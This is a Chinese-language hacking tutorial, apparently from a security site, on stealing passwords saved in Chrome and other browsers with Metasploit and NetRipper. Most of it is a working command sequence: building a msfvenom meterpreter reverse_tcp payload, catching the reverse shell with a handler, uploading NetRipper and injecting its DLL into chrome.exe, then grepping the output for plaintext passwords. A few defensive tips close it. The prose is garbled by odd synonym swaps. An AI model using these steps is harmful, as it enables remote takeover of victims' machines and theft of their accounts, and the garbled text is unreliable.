快捷搜索:  网络  渗透  后门  CVE  扫描  木马  黑客  as

Metasploit+NetRipper获取Chrome等阅读器帐号暗码测试

媒介

本篇文章我将手把手教会各位Buffer怎么样使用Metasploit+NetRipper获取Chrome等阅读器内保存的帐号暗码。

图片.png

需要工具:

Kali Linux&Metasploit

NetRipper

1.下载并且设置NetRipper

git clone https://github.com/NytroRST/NetRipper.git

图片.png

mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

图片.png

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

图片.png

cp DLL.x86.dll NetRipper.x86.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

图片.png

cp DLL.x64.dll NetRipper.x64.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

图片.png

2.生成Windows的Payload用于确立于目标机器的连接

msfvenom -p windows/meterpreter/reverse_tcp LHOST=You IP LPORT=XXXX -f exe > Payload.exe

图片.png

3.启动Metasploit并且进行监听

msfconsole

图片.png

use exploit/multi/handler

图片.png

set payload windows/meterpreter/reverse_tcp

图片.png

set LHOST IP

图片.png

set LPORT 6666

图片.png

options

图片.png

exploit

图片.png

目标机运行Payload获取到反弹shell

图片.png

4.上传DLL以及exe文件到目标机器的C:\Users\Administrator\AppData\Local\Temp目录下

Upload /root/Desjtop/NetRipper/x64/DLL.dll
Upload /root/Desjtop/NetRipper/x64/NetRipper.exe

 图片.png

shell
NetRipper.exe

图片.png
运行NetRipper.exe

NetRipper.exe –w DLL.dll –l TEMP –p true –d 4096 –s user,pass

图片.png

NetRipper.exe ConfiguredDLL.dll chrome.exe 

我注入到了是chrome阅读器的进程,你也能够注入到其他阅读器(火狐,QQ阅读器,360阅读器等等)的进程,这里以Chrom阅读器为主

图片.png

5.测试验证

图片.png
图片.png

关上谁人刚刚下载的txt文件

图片.png

Ctir+F输入pwpw或者pwd、pass、password等症结词来搜索明文暗码

图片.png

参考文章:Freebuf玩转metasploit系列(第八集)

要是获取失败帐号暗码的话,企业黑客,多是网站使用了Https协定,或者上岸时在内陆就进行了帐号口令的一个加密混淆!(小我私人推断)

防范要领:

1.不要点击来历不明的文件

2.阅读器登录可以扫描就扫描登录

3.要是没有必要小我私人建议不要在阅读器保存本人的交际帐号暗码

*

您可能还会对下面的文章感兴趣: